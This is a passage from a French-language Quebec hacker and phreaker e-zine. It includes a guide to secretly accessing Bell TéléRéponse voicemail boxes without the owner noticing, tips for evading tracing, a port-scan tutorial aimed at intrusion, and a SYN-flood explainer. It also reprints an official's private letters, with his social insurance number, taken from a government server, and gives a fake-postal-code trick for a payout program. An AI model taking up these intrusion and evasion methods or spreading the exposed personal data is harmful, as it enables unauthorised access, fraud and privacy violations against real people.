Téléréponse et que son propriétaire est absent, et vous tapper '*' durant le message d'intro. Pour plus d'Information, aller revoir la parti *Les Étapes pour accéder au menu à partir d'un autre Boîte Vocale* un peu plus haut dans ce document. Après 17 heure, c'est assez facile à trouvé vu que les entreprises ferment vers cette heure la. Donc, avec les 2 méthodes que je viens de vous décrire, vous pouvez hacker la Boîte Vocale TéléRéponse à l'insus de son propriétaire, meme si celui ci est à coter de celle-ci. *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* *+ 5- Menu d'une Boîte Vocale du Service TéléRéponse +* *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* Menu de la personne qui envois un message sur une Boîte Vocale TéléRéponse ('#' apres le message enregistré) 1-Si vous etes satisfait de votre message 1-Pour envoyer votre message en mode de transmission normal 2-Pour envoyer votre message en mode de transmission urgent 2-Pour entendre votre message 3-Pour effacer et enregistrer de nouveau 4-Poursuivre l'enregistrement à partir de l'endroit ou vous vous étiez arrêter Menu de la Boîte Vocale Téléréponse 11- Pour écouter les messages non entendus 6-Faire parvenir une copie à quelqu'un, accompagné de vos remarques 0-option 1-Privé 2-Urgent 3-Confirmation 4-transmission différé 1-Pour indiquer la date #-Pour envoyer le message des maintenants *-Pour annulé 7-Effacer le message 8-Pour y répondre 0-option 1-Privé 2-Urgent 3-Confirmation 4-transmission différé 1-Pour indiquer la date #-Pour envoyer le message des maintenants *-Pour annulé 9-Sauvegarder le message #-Pour sauter le message 1- Pour écouter vos messages 2- Pour envoyer un message 0-option 1-Privé 2-Urgent 3-Confirmation 4-transmission différé 1-Pour indiquer la date #-Pour envoyer le message des maintenants *-Pour annulé cet destination 3- Pour repéré un message 4- Modifier vos Options personnels 1-Activé ou désactivé Avis de message 3-Pour activé 4-Pour la désactiver *-Pour quitter #-Confirmer *-Annuler 2-Modifier les options de gestions 1-Pour contrôler les mots de passe 2-Pour établir ou modifier des listes de distribution de groupe 3-Pour changer les niveau de message guide 1-Pour entendre les messages guide normaux 2-Pour entendre les messages guide détaillés 3-Pour entendre les messages guide brefs 4-Modifier l'option date et heure 1-Pour activé l'option Date et Heure 2-Pour désactivé l'option Date et Heure *-Retour au menu précédent 3-Pour enregistrer des messages d'accueil 1-Pour modifier votre message d'accueil personnel 3-Pour modifier votre nom pré-enregistré *-Pour quitter (Retour au menu précédent) *-Rompre la communication Les choses à retenir de ce menu, c'est que '*' sert toujours à retourner au menu précédent lorsque vous êtes pas dans le menu principal, et le '#' est pour confirmer une action. *+*+*+*+*+*+*+*+* *+ 6- Conseils +* *+*+*+*+*+*+*+*+* Quand vous appeler un service de TéléRéponse, je vous conseil FOR- TEMENT de faire *67 (Numéro Confidentiel), c'est gratuit et c'est pas beaucoup plus long a faire. Et vous éliminer les chances de vous faire achaler par l'entreprise ou l'individu en question. Quand vous rendez visite à une Boîte Vocale TéléRéponse, essayer de pas laisser de trace. Ce que je veux dire pas la, c'est que exemple sur la Boîte Vocale en question il y a quelques nouveaux messages, et vous avez le goût de les écouter. Mais il a un probleme. Comment laisser la mention nouveau message, sinon l'opérateur de la Boîte Vocale va trouver ca bizzare que la mention ne soit pas dit, et surtout que les messages sont rendu dans les archives ou éffacés. C'est pourquoi j'ai la solution à votre probleme. Quand vous écoutez les messages, vous n'avez qu'à appuyer sur '#' pour sauter au message suivant. Et miracle, la mention nouveau message reste. Je vous conseil de hacker un service TéléRéponse à partir d'une cabine Téléphonique. Comme ça, vous éliminez quasi totalement les risques de vous faire buster (Même que si les risques sont vraiment minible, vu que ce n'est pas un délit très grâve). Mais, pour ce qui est du crackage du mot de passe, vous pouvez le faire de chez vous. Parce que si vous changez rien à la configuration du système TéléRéponse, personne va le savoir que vous avez trouvé le mot de passe. Bon, maintenant pour ce qui est du 0,25$ que ca coute pour appeler à partir de la Cabine ou du long distance a partir de chez vous, il a une solution pour éliminer cela, qui est légal à 100%. Saviez vous que les 1-800 ou 1-888 sont gratuit a partir d'une cabine téléphonique et surtout ne coûte aucun long distance. Heh bien oui, donc vous appeler un 1-800 ou un 1-888 qui possède un service TéléRéponse, et vous suivez les procédures que j'ai dis dans le chapitre *Les Étapes pour accéder au menu à partir d'un autre Boîte Vocale*. Donc, vous pouvez accéder à une Boîte Vocale TéléRéponse gratuitement à partir d'une cabine, et vous avez encore moins de chance de vous faire retracer, vu que c'est comme un transfert de box. Et aussi vous pouvez hacker n'importe quel Boîte Vocale TéléRéponse, même si elle est à l'autre bout du Québec, vu qui à pas de long distance. Et pour le monde qui lisent entre les lignes, ca veux aussi dire que vous pouvez laisser un message sur Le téléréponse a quelqu'un a partir d'une cabine téléphonique, sans que ca vous coûte une cent. Donc profiter en. Je vous aurais bien donner une liste de 1-800 avec TéléRéponse, mais j'en ai pas assez pour le moment, et je tiens à garder ceux que j'ai le plus longtemps possible. C'est pourquoi si j'en trouve d'autres, je vais les rajouter dans une prochaine version de ce document. NB: La boite Vocale 1-800 doit se trouver à l'origine dans le meme exchange (450,514,819,418) *+*+*+*+*+*+*+*+*+* *+ 7- CONCLUSION +* *+*+*+*+*+*+*+*+*+* Pour conclure, si vous avez bien compris çe document, vous êtes supérieur à plusieurs Vendeurs de produits Bell Canada en matière de connaisance des TéléRéponses. Y connaissent rien les CRIS! À venir: Tutorial sur les TéléRéponse Plus et Tutorial sur les systemes Centrex. VIVE LE QUÉBEC!!! J'aimerais souligner la collaboration de Bell Canada envers ce document. Salut ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 |3-L'utopie du portscan |( ) Phreak (X) Hack ( ) Autres '.__________Par LeMarquis________ ________ lemarquiz@yahoo.com ______ ___ Le port scan est une activité essentielle pour toute tentative d'intrusion. Connaître les services présents sur un serveur est primordial pour pouvoir en abuser. Cependant les vieilles techniques de portscan sont devenues désuètes avec l'arrivée de programme complexe qui analyse le trafic internet (logger). Je vous ferai part des techniques élémentaires de portscan ainsi que des nouvelles techniques plus difficiles à détecter. Je me concenterai sur les TCP portscan et je laisserais de coté les UDP et les ICMP scans. Les TCP portscans se divisent en 3 catégories : les scans simples, ceux qui se font sans proxy, les bounces scan, ceux qui utilisent un proxy et le scan complexe, qui utilise un proxy + des spoofs packets (source modifiée). Dans mes schémas, j'utiliserai le nom de CIBLE pour l'IP à scanner et EVIL pour notre propre IP. Le caractère stealth représente la faculté qu'à un type de scan de n'être pas détecté. ------========------------------------------=-=-=---- -+-+-Scans simples-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ------========-----------------------------------------=-=-=---- 1-TCP Connect(): Vitesse: Très rapide Stealth: Faible Ceci est le type de scan le plus simple. Ce n'est que la demande classique et légitime de connexion sur un port de notre cible. N'importe quel user sur un serveur unix, a accès à ce type de scan. C'est le TCP connect qui est utiliser dans le programme unix strobes qui a l'avantage de scanner seulement les ports de votre /etc/services, ceux des services connus. Le fort désavantage de ce type est le niveau de stealth très mauvais. Les fichiers de log des programme qui gèrent les services, vont tous noter l'IP d'EVIL. EVIL CIBLE SYN ----> <---- SYN|ACK SYN|ACK ----> 2-TCP SYN scanning: Vitesse: Rapide Stealth: Moyen Surnommé le 'half-open' scan, ou le demi-scan. Nous ne faisons ici pas un connexion complètement. Nous envoyons d'abord un SYN à la cible. Si son port est ouvert elle nous renvoie un SYN|ACK. Immédiatement après que l'on reçoive son packet, nous lui envoyons un RST qui annule la demande de connexion. L'avantage de cette technique est que plusieurs OS ne la détecteront pas. EVIL CIBLE SYN ----> <---- SYN|ACK RST ----> 3-TCP FIN scanning: Vitesse: Moyenne Stealth: Moyen Le TCP SYN scan n'est cependant pas parfait, certain firewall et packet filter bloquent les FIN packets. De plus plusieurs loggeurs réussissent à détecter ce scan. Il nous reste à utiliser des FIN packets au lieu de nos RST packets utilisés précédemment. L'envoie d'un FIN dit à la cible de ne plus envoyer d'autres packets. Certain OS ont contrairement tendance à envoyer un RST packet ce qui annule l'effet stealth. Tout ceux tournant sur Microsoft ne sont pas vulnérable, sauf que la plupart des autres le sont. EVIL CIBLE SYN ----> <---- SYN|ACK FIN ----> ------========------------------------------=-=-=---- -+-+-Bounce scan-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ------========-----------------------------------------=-=-=---- * 4-FTP bounce attack: Vitesse: Lente Stealth: Fort Un vieux bug dans le protocole FTP permet d'effectuer des portscans a même une session ftp. Il s'agit d'utiliser la command PORT sur un ftp. Le PORT tentera de se connecter sur notre cible au port que l'on veut vérifier. Ensuite avec la commande LIST, le ftp envoiera le contenu du répertoire courant dans le port de notre cible. Le commande répondra soit par "transfer will be successful" si le port est ouvert, sinon par "425 Can't build data connection: Connection refused." si le port est fermer. Ce bug vient du fait que nous pouvons établir une connexion proxy sur un ftp. Il faut noter que les serveur ftp récents enlèvent la possibilité d'un proxy. Ce type de scan cache presque complètement la trace d'un portscan venant de votre IP. Le ftp serveur garde toujours un log de toutes vos demandes de proxy. Votre scan reste en log sur le ftp pour un certains nombres de jours. EVIL FTP CIBLE <--session--> PORT ----> SYN ---> LIST ----> <---- RESULT 5-SOCKS bounce: Vitesse: Lente Stealth: Fort Les socks serveurs sont des redirecteurs souvent présents sur des wingates au port 1080. On peut se connecter sur un autre serveur en partant de ces socks. On peut donc faire un portscan avec le socks. Semblable au FTP bounce, nous ferons un scan avec notre socks qui essayera de se connecter sur les port de notre cible. Le socks fera un TCP Connect() sur la cible et sera peut-être logger sur notre cible. Tout comme le FTP bounce nous pouvons être retracer par les logs du wingate gérant le socks. EVIL SOCKS CIBLE <--connexion-> SYN -----> <-------- RESULT 6-Web proxy scan: Vitesse: Lente Stealth: Fort Les web proxy, qui sont courant sur le net, peuvent aussi servir de redirecteur pour nos scan. Avec une bounce, on peut demander à notre web proxy de se connecter sur la page web fictive de notre cible à un certain port. Le web proxy nous dira comme réponse s'il a bien réussi à se connecter et qu'il n'a pas pu avoir le contenu web (surprenant!). Cependant de nombreux web proxy n'acceptent seulement de se connecter sur les pages web ayant comme port 80 ou 8080. De plus, il faut faire attention à ne pas prendre de web proxy qui sont publique car ceux-ci renvoient votre IP en "forward" quand ils réussissent à se connecter sur un port de notre cible. La grosse lacune de ce scan est que les réponses des web proxy sont rarement les mêmes d'un proxy à l'autre. Certains proxy ne veulent tout simplement pas nous dire s'ils ont réussi à se connecter. Ce bounce utilise le web proxy pour scanner la cible et comme pour tout les bounces, le proxy conserve encore les précieux logs de notre scan. EVIL PROXY CIBLE <--connexion--> GET CIBLE:PORT --> SYN --> <-- RESULT ------========------------------------------=-=-=---- -+-+-Scan complexe-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ------========-----------------------------------------=-=-=---- 7-Idlescan: Vitesse: Très lente Stealth: Très fort Le idlescan est le dernier né des portscans. Il est très complexe mais quasiment indétectable. Il utilise le nombre "ip.id" qui se trouve sur chaque TCP packet. Ce ID monte d'une unité à chaque packets envoyés, nous pouvons alors deviner le nombre de packet envoyés par un certain IP pendant un certain temps. Si l'on envoie un SYN sur un port fermer, l'ID de notre packet augmentera d'une unité, tandis que si le port est fermé le ID restera le même. Port fermé: EVIL CIBLE SYN ----> <---- SYN|ACK ID + 1 Port ouvert: EVIL CIBLE SYN ----> <---- RST ID Ce qui nous amène à utiliser des IP sans trafic qu'on n'appellera des senseurs. Ils peuvent être soit des routeurs ou des imprimantes. Ceux-ci ne doivent absolument pas avoir de trafic de packet car cela changera leur numéro de ID. Premièrement, nous regardons le ID de notre senseur. Ensuite nous envoyons un SYN spoof packet (source modifié) sur notre cible avec comme source notre senseur. Finalement, nous trouvons le nouveau ID de notre senseur. La cible recevra le SYN packet, voyant qu'il a comme source notre senseur, il envoiera sa réponse à notre senseurs. Si le ID du senseur a augmenté, le port de la cible est fermé, si il reste le même alors le port est ouvert. Port ouvert: EVIL CIBLE Senseur (senseur) SYN ----> SYN|ACK ---> ID+1 Port fermer: EVIL CIBLE Senseur (senseur) SYN ----> RST ---> ID Voici enfin cette technique. Elle est presque 100% indétectable. Notre spoof packet envoyé sur la cible ne peut pas être retracer et notre vérification du numéro de ID du senseur n'est pas logger. Le scan semble venir du senseur avec un TCP connect, mais le senseur ne log rien. Cette méthode étant très récente et complexe, elle demeure très lente. Un de ces désavantages est de trouver de bons senseurs. Avec plusieurs, nous pouvons augmenter la vitesse du scan. 8-Fragmentation: Ce n'est pas précisément un autre technique de scan mais plutôt une modification que l'on peut faire sur chaques scan (en excluant les bounces et le idlescan). Au lieu d'utiliser des TCP packets complets, nous utilisons des packets divisés. Ce qui rend la vie des logger et des filtres de packet difficile. De nombreux crash quand il reçoivent ce type de packet. Par contre, nous ne pouvons utiliser ce type de packet sur certaine cible qui ont un firewall qui bloque tous les packet fragmentés. Finalement, pratiquement tout ces scans nécessitent un accès root sur un serveur unix. Les types accessibles à un user ou à un windows user est le TCP Connect() et les bounces scan. Cependant, les programmes de scan sur windows sont moins diversifiés. Ils sont condamner a utiliser des types de scan peu sophistiqué. Chaques scan a ses avantages, aucun n'est parfait. La vitesse et le niveau de détectabilité sont deux qualités très importantes. Pour ce qui est des bounce scan, la facilité à trouver un proxy est aussi un avantage. Je ne vous cacherai pas ma préférence pour le TCP SYN scan pour les fast et assez stealth scan. J'ai aussi une grande admiration devant les merveilles du idlescan, ce scan carrément utopique. Chaqu'un à sa préférence sur un type de scan, et les goûts ne se discutent pas... ------========-----------------------------------------=-=-=---- [ Programmes pour le scan ] Les windows portscanner et strobes ; Revelation 1-TCP Connect() Nmap Fyodor's Stealth Port Scanner ; http://www.insecure.org/nmap/ 1-TCP Connect() 2-TCP SYN scanning 3-TCP FIN scanning 4-FTP bounce attack 8-Fragmentation Socks Scan V 2.0 by ICEHOUSE ; sos.tgz 5-SOCKS bounce Proxy Bounce Scanner ; pbs.c 6-Web proxy scan idlescan v0.1-alpha3 by LiquidK ; idlescan-v0.1-alpha3.tgz 7-Idlescan ------========------------------------------=-=-=---- References: Phrack 51 Fyodor Article - http://www.insecure.org/nmap/p51-11.txt BugTraq Linux blind TCP spoofing - http://www.securityfocus.com/ Liste de Web proxy et de socks - http://proxys4all.cgi.net/ Idlescan README ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 4-Le SYN flooding |( ) Phreak (X) Hack ( ) Autres '.__________Par Endrix________ ________ lordendrix@hotmail.com____ ___ Introduction: ¯¯¯¯¯¯¯¯¯¯¯¯¯ Bon la chu tannez de recevoir des emailz pour me demander comment faire un flood SYN. Alors la je vais vous dire comment ca marche et non comment le faire parce que nos amis(es) de la GRC n'ont pas l'air d'aimer ca. Explication: ¯¯¯¯¯¯¯¯¯¯¯¯ Le principe est assez simple : une machine A envoie à une machine B un paquet SYN semblant venir d'une machine X non accessible éteinte ou qui n'existe tout simplemement pas. La machine B envoie donc le second paquet pour l'ouverture de la connection et attend la réponse de la machine X, qui ne viendra jamais. Ainsi, la machine B aura une connection monopolisée pendant un certain laps de temps. Si la machine A envoie de nombreux paquets SYN, la machine B peut devenir saturée et ne plus accepter de nouvelles connections. Cette attaque fait donc partie des attaques du type refus de service, puisque la machine cible devient indisponible et refuse ainsi un service à d'autres utilisateurs. Plusieurs erreurs possibles: -> Unreachable host -> Reset -> Time Exceeded Conclusion: ¯¯¯¯¯¯¯¯¯¯¯ Bon, j'ai au umpeu d'aide pour les expressions dans ce texte mais dans l'ensemble j'espère que vous avez compris comment marche le packet SYN et j'espère que vous allez arrêter de m'envoyer des emailz demandant de l'aide à ce sujet. n.b. Ceci est pour la GRC : "Essayez de trouver quelque chose d'illégal dans ce texte bande d'enfoiré :)" ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 5-Certains code régionaux de Bell&Cantel |(X) Phreak ( ) Hack ( ) Autres '.__________Par Endrix________ ________ fbasoft@yahoo.com ______ ___ Voici les codes régionnals pour les pagettes et cellulaires dans la région de Montréal (514) =========================================================================== Cellulaire Bell: 212 213 214 217 221 231 232 233 234 235 236 237 238 239 249 304 306 386 404 592 709 786 869 891 893 894 895 910 912 913 914 915 916 917 918 919 920 929 942 943 946 949 951 953 955 957 978 980 984 Pagette Bell: 201 202 203 204 230 301 361 404 407 408 423 440 517 520 521 580 719 837 851 853 857 859 869 879 896 921 960 Cellulaire Cantel: 240 241 242 243 244 262 497 501 591 594 726 758 781 823 824 825 826 857 862 865 867 880 892 898 909 924 927 928 941 944 945 947 952 975 979 983 Pagette Cantel: 201 290 361 402 801 854 930 936 Clearnet Mike: 820 821 829 832 863 977 Clearnet PCS: 805 808 816 817 830 831 Cellulaire Microcell: 570 571 572 573 574 575 576 577 578 803 812 813 814 815 992 993 994 995 996 998 999 Voici les différents codes de Montréal ====================================== (514) 205 215 223 251 252 253 254 255 256 257 259 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 302 312 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 350 351 352 353 354 355 356 362 363 364 365 366 367 368 369 370 374 376 380 381 382 383 384 385 387 388 389 390 391 392 393 394 395 396 397 398 399 406 448 480 481 482 483 484 485 486 487 488 489 490 493 494 495 496 497 498 499 502 522 523 524 525 526 527 528 529 530 540 590 591 593 594 595 596 597 598 599 640 642 643 644 645 648 650 667 673 720 721 722 723 724 725 727 728 729 731 732 733 734 735 736 737 738 739 740 741 744 745 747 748 749 751 760 761 762 765 766 767 768 769 790 801 807 818 823 840 841 842 843 844 845 846 847 848 849 850 852 855 856 858 860 861 864 866 868 870 871 872 873 874 875 876 877 878 881 888 890 897 899 906 907 908 925 926 927 931 932 933 934 935 937 938 939 940 948 954 956 981 982 983 985 986 987 988 989 990 991 992 993 997 Voici les codes régionnals pour les pagettes et cellulaires dans la région de Ottawa (613) ==================================================================================== Cellulaire Bell: 290 292 293 299 612 720 724 725 761 791 794 795 798 850 859 Cellulaire Cantel: 240 286 291 302 762 769 796 797 799 851 852 862 Pagette Cantel: 220 239 364 560 566 597 751 780 786 787 Clearnet Mike: 223 Clearnet PCS: 266 277 282 325 Clearnet: 229 Cellulaire Microcell: 261 262 265 276 Cellulaire: 719 Voici les différents codes de Ottawa ==================================== (613) 224 225 226 228 230 231 232 233 234 235 236 237 238 239 241 244 245 247 248 249 260 274 298 350 364 368 520 521 523 526 560 562 563 564 565 566 567 569 580 581 593 594 596 597 598 660 688 719 721 722 723 724 725 726 727 728 729 730 731 733 734 736 737 738 739 740 741 742 744 745 746 747 748 749 750 751 755 759 760 761 763 765 768 780 781 782 783 784 785 786 787 788 789 792 798 820 828 829 842 844 860 863 940 941 943 944 945 946 947 951 952 954 957 990 991 992 993 995 996 998 Voici les codes régionnals pour les pagettes et cellulaires dans la région de Hull (819) ================================================================================== Cellulaire Bell: 664 712 773 775 790 Cellulaire Cantel: 743 773 921 923 Pagette Cantel: 772 773 Clearnet Mike: 955 Cellulaire Microcell: 328 329 Voici les différents codes de Hull ==================================== (819) 243 246 328 420 503 561 568 595 770 771 772 775 776 777 778 779 790 920 953 955 956 994 997 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 6-La GRC introduite par un anonyme |( ) Phreak (X) Hack ( ) Autres '.__________Par LeMarquis________ ________ lemarquiz@yahoo.com ______ ___ Est-ce qu'il n'existe pas de cible plus symbolique que la GRC pour nous, jeunes rebelles des temps modernes. Mais qu'est-ce que la GRC a de si spéciale ? Elle est a d'abord su appliquer la loi qu'on utilise pour les tuer et violeur sur de jeunes curieux explorant les réseaux informatique et téléphonique. Elle a de plus harceler un grand nombre d'entre eux. Il s'agit de voir un peu l'histoire du underground québécois pour voir qu'il est jaillionné de bust de cette police fédérale. Le prestigieux groupe NPC a lui-même été la victime d'attaque de ces pseudo-justicier. Le fait que les agents fédéraux gagne plus de 60 000$ n'arrive pas a suscite ma colère mais le fait qu'il ose encore chialer contre leur supposé condition de travail difficile ou il risque chaque jours leur vie me rend dangereusement violent. Certain croiront que je ne fais que répéter de vulgaire préjugé. Je vous donnerai la preuve concrète dans ce même article. Tout a commencer lorsque tard dans la nuit ou plutôt tard le matin, je m'interessa avant de m'étendre au site officiel de la grc (www.rcmp-grc.gc.ca). Ce site me paraissait intéressant sur son contenu sur certaine loi concernant le fameux 'crime' informatique. Par simple curiosité j'ai effectuer une panoplie de scan sur le serveur. Je porta en premier mon attention sur le ftp service. Banner du ftp: ------------------------------------------------------------------ Government of Canada / Gouvernement du Canada ------------------------------------------------------------------- This server is owned and operated by the GTIS branch of the ministry of Public Works and Government Services Canada (PWGSC). Ce serveur (server) appartient et est opéré par les SGTI; un département du ministère des Travaux publics et Services gouvernementaux Canada (TPSGC). ------------------------------------------------------------------- WARNING / AVERTISSEMENT UNAUTHORIZED ACCESS IS PROHIBITED UNDER SECTIONS 326, 342.1, & 430(1.1) OF THE CRIMINAL CODE OF CANADA. VIOLATORS WILL BE PROSECUTED. L'ACCÈS SANS AUTORISATION EST DÉFENDU EN VERTU DE LA SECTION 326, 342.1 OU 430 (1.1) DU CODE CRIMINEL CANADIEN. TOUTE VIOLATION FERA L'OBJET DE POURSUITES. ------------------------------------------------------------------- Je suis prêt a gager que nombreux sont ceux qui ont sursauter en voyant cette avertissement. Ils ont aussitôt fermer leur ordinateur et se sont planquer en attendant les sirènes. Il est vrai que ce message est quelque peu apeurant, ne seraisse que celui-ci permet un certain support légale contre une poursuite. Il ajoute aussi que "TOUTE VIOLATION FERA L'OBJET DE POURSUITES.", il faut cependant être très naïf pour croire a cette partie du texte. Avec les précaution nécessaire, j'ai essayer plusieurs login et password par défaut sur le serveur. Je ne fut pas surpris de voir aucun account présent. J'avais a faire a un site gouvernemental et même judiciaire. Mais j'avais oublier l'account le plus courant et le plus inoffensif: l'ANONYMOUS. Ce même username si utiliser dans les ftp publiques. Il est parfois présent sur les serveur unix, mais nous laisse habituellement peu de liberté, en nous restreignant dans certain directory sans accès d'écriture, ni accès a de l'information priver du serveur. Je n'en croyait pas mes yeux quand j'ai vu que le ftp s'ouvrait a moi dans la vrai racine du serveur (/). Oui je n'était pas emprisonner dans des directory vides sans importance. Je pouvais lire plusieurs directory et me promener a ma guise dans l'ensemble des fichiers du serveur. On m'avait retirer le droit d'écriture, je ne pouvait penser a modifier leur page web. Carte au Trésor ----------------------------------------------------------------- / =========> departments/ ========> pwgsc/ || || || $$$$Grant's CD$$$$ <====== gwtrans/ <==== ----------------------------------------------------------------- Nous avons su avec le banner du début que le site était maintenu par Public Works and Government Services Canada (PWGSC). On retrouve donc les documents de ce ministère sur le serveur et malheureusement pas ceux de la GRC. Avis a ceux qui croyait que la cia.gov habritait tout les documents classer top secret. Nous avons donc ici les documents de travail de Grant. Mais qui est ce Grant ? Grant Westcott est le Sous-ministre adjoint au Services gouvernementaux de télécommunications et d'informatique (SGTI) et aux Travaux publics et Services gouvernementaux Canada (TPSGC). Il est le responsable de tout ce que le gouvernement prend comme décision au sujet des services de télécommunications et d'informatique. Il est donc l'adminis- trateur de l'ensemble des réseaux du gouvernement fédérale. Il semble aussi proche du premier ministre Jean Chrétien qui est mentionné dans un grand nombre de ces documents de travail. Notre gouvernement fédérale est corrompu jusqu'à la moyelle. Après le ministre des finances qui exploitait un compagnie de bateau au Canada. Mais cette entreprise était enregistré dans un paradis fiscaux des Antilles, de quoi sauvé beaucoup d'argent en impôt. Voici que notre l'admin informatique Westcott imite celui-ci. Et oui, ce n'est après avoir consulter quelques documents fédéraux sur le site de la GRC que l'on voit la magouille qui ce joue a Ottawa. En voici la preuve : /* Canadian Offshore Financial Services Suite 1869, Manulife Place, 10180 - 101 Street, Edmonton, Alberta, Canada T5J 3S4 Dear Mr. Michael Ritter: I would appreciate receiving further details on how one goes about establishing residency and/or citizenship in Belize, the Bahamas, Malta, Cayman, the Turks and Caicos or any other countries with favourable tax policies for Canadian who are about to retire. In our circumstances, I am a senior civil servant who is starting to plan for retirement and will be in receipt of a pension of just under $80,000 per annum. In addition my wife and I will have assets (RRSPs, equity and real estate) worth approximately $1 Million. */ Notre Westcott veux maintenant quitter le pays, et transféré sa pension du gouvernement et ses avoirs personnel d'une valeur d'un millions de dollar dans un de ces paradis fiscaux. Et choisira finalement dans une seconde lettre le Belize. Il ne se contente pas seulement de quitter le pays avec un million, il envoie aussi une lettre directement à Revenue Canada en demandant une réduction d'impôt avec comme raison qu'il est aussi employer au ministère de la Justice. /* Name: Grant Charles Westcott S.I.N.: 434-153-599 Employer Justice Canada 2nd floor LaSalle Building Ottawa, Ontario K1A 0H8 Attn: Connie Murray This is a request to renew my deductions at source for calendar year 1998. I am requesting a deduction of $7800/annum. Thank you Grant C. Westcott */ On voit là comment sa marche au gouvernement. Tout le monde se grasse la patte entre eux. Après on entend dire par cette administration comment il aime leur pays et comment il font leur possible pour son progret. Hypocrisie. Ils ne nous s'agissait de faire un petite intrusion sur le site de la GRC pour apprendre le contraire. Ce fut propablement l'intrusion la plus minable jamais faite contre un site du gouvernement. Je vous dirai qu'elle est à l'image de la GRC qui elle-même s'occupe de notre propre sécurité. On peut faire un parallèle avec le ministère de la justice qui est supposé rendre justice à la population et qui rend des avantages sociaux à certains requains financiers. Il n'en demeure pas moins que les documents personnelles et de travail sont encore disponible avec le ftp de la GRC. Quiconque veut confirmer mes dires pourra en anonymous prendre les documents qu'il lui faut en suivant la carte au trésor. Il faut noter que l'accès anonymous est parfaitement légale car il est publique. J'ai faite beaucoup de promenade sur les réseaux du gouvernement provincial. Je peux vous dire que jamais je n'ai vu un seule document que je trouvais louche. Avec le site de l'an 2000, je n'ai que fait exprimer mon opinion sur le sujet du bug. Cependant après seulement une seule visite sur un site fédéral je me retrouve avec plusieurs documents compromettant. Est-ce un hasard ? J'en doute. En reprenant les mots d'un certain auteur de NPC " La distance en ce monde attire la paperasse et depuis toujours elle est un facteurs de corruption... " Quand l'on pense que certains ne veulent pas se délaisser de cette plaie... ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 7-Alladvantage |( ) Phreak ( ) Hack (X) Autres '._______Par [ewoks] & Svaik ___ ewoks@pyrofreak.org & svaik@biosys.net_ Qu'est ce que alladvantage: All advantage est une compagnie américaine vous payant pour surfer au tarif de 50 cents U.S. de l'heure c'est à dire environ 70 cents canadien. Alladvantage existe depuis mars dernier, c'est une entreprise fiable qui a distribuer pour le mois d'octobre 1999 plus de 30 chèques supérieurs a 1000$ (Il y a meme une personne qui a touché un cheque de plus de 4000$US). Le grand plus de alladvantage est son système pyramidal permettant de référencer des personnes sous vous. Vous recevrez $0.10 US pour chacune des 25 premières heures surfées par chaque personne que VOUS référencerez. - Vous recevez $0.05 US pour chacune des 25 premières heures surfées par chacun des référencés de vos référencés, et ce, jusqu'à 4 sous-niveaux :-) ATTENTION : les heures de vos référencés vous sont payées seulement si vous faîtes autant d'heures qu'eux. Si vous faîtes vos 25 heures pas de problèmes, mais si vous ne faîtes que 15 heures par exemple, seules les 15 premières heures de chacun de vos référencés vous seront payées. Alladvantage paye mensuel- lement dès que le montant accumulé est de 20$(Ils envoient les chèques entre le 20 et 30 de chaque mois). Le 3 novembre, AllAdvantage confirmait par téléphone à l'émission "Branché" de Radio-Canada qu'elle commençait dès le mois de novembre à payer ses abonnés au Québec. Le petit problème de alladvantage au québec: Pour le Québec, AllAdvantage ne distribue pas immédiatement la ViewBar, donc vous ne commencez pas à faire de l'argent imméditament! Cependant, j'ai découvert un truc pour que les gens du Québec puisse obtenir leur Viewbar immédiatement lors de l'inscription, donc de faire de l'argent immédiatement! La marche à suivre: Pour ceux qui sont déja inscris où qui possède déja la viewbar veuillez vous désabonner et effacer toute traces de la viewbar. Pour vous désabonner vous n'avez qu'a allez sur le site web de AllAdvantage(alladvantage.com) vous allez dans MY ACCOUNT vous allez la ->If you are already a member, and would like to cancel your membership, click here. Ensuite désinstaller le programme de la view bar sur votre ordinateur, ensuite réinstallez-le, et réinscrivez-vous! Pour s'inscrire: Tout simplement en allant a cette adresse http://www.alladvantage.com/ puis cliquer sur "JOIN" une fois rendu sur leur site. Prenez le temps d'y lire leur F.A.Q. ("Frequently Asked Questions" ou Foire Aux Questions) dans la section "How it works", c'est vraiment complet. Pour plus de sécurité, la page où vous vous inscrivez est encryptée. Quand vous aller entrer vos coordonnées lors de votre inscription, Entrez le Code Postal suivant au lieu du votre! (Inquiètez-vous pas, vous pourrez mettre votre vrai code postal par la suite, pour qu'ils puissent vous envoyer votre chèque$$ ;-) ) K0A 3C0 lastnews.forez.com -[Dernieres Nouvelles]- La références des nouvelles internet ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 8-Fréquences (The Recueil) |( ) Phreak ( ) Hack (X) Autres '._______Par PaToFF ____________________ ______ patoff22@hotmail.com ___ Bon ca y est, c'est encore moi content? J'espère car cet article est presque ne bible pour ca le nom de The Recueil qui est en prime avec le titre habituel.Et aussi je crois qu'il est assez complet dans le style fréquences secret police...etc., mais même a vous checkerer dans les choses a venir: que je vais sûrement refaire un petit bout d'article sur c'est sorte de fréquence car les téléphones et police...sont sûrement les plus le fun a écouter et les plus intéressante. Oh aussi.Il y a beaucoup de texte du style liste d'épicerie ha ha! alors suposément que certain n'aime pas tk on n'est pas tous de dieu hein? alors a vous de voir :) So Enjoy! Bon dans ce mag je vais vous donner(parler) de: Les fréquences secret de police CIA..etc que j'ai finalement retrouver quand mon cousin a renverser sa bière a terre j'ai vu que la revu etait en dessous de mon lit chouette n'est ce pas? Et aussi que j'ai trouver sur un site que j'ai trouver dans ma revu... Et puis aussi il y a les ondes des cellulaires et je vais donner les codes 10 de la SPCUM et redonner quelques codes 10 puisque dans les Fréquences secrètes ces codes sont donnés car il m'en manquait quelques un. Et un tas de petites affaires sur les ondes (satellite,Sans fil etc...) et aussi un article trouver sur le net par neuro qui est a la fin de 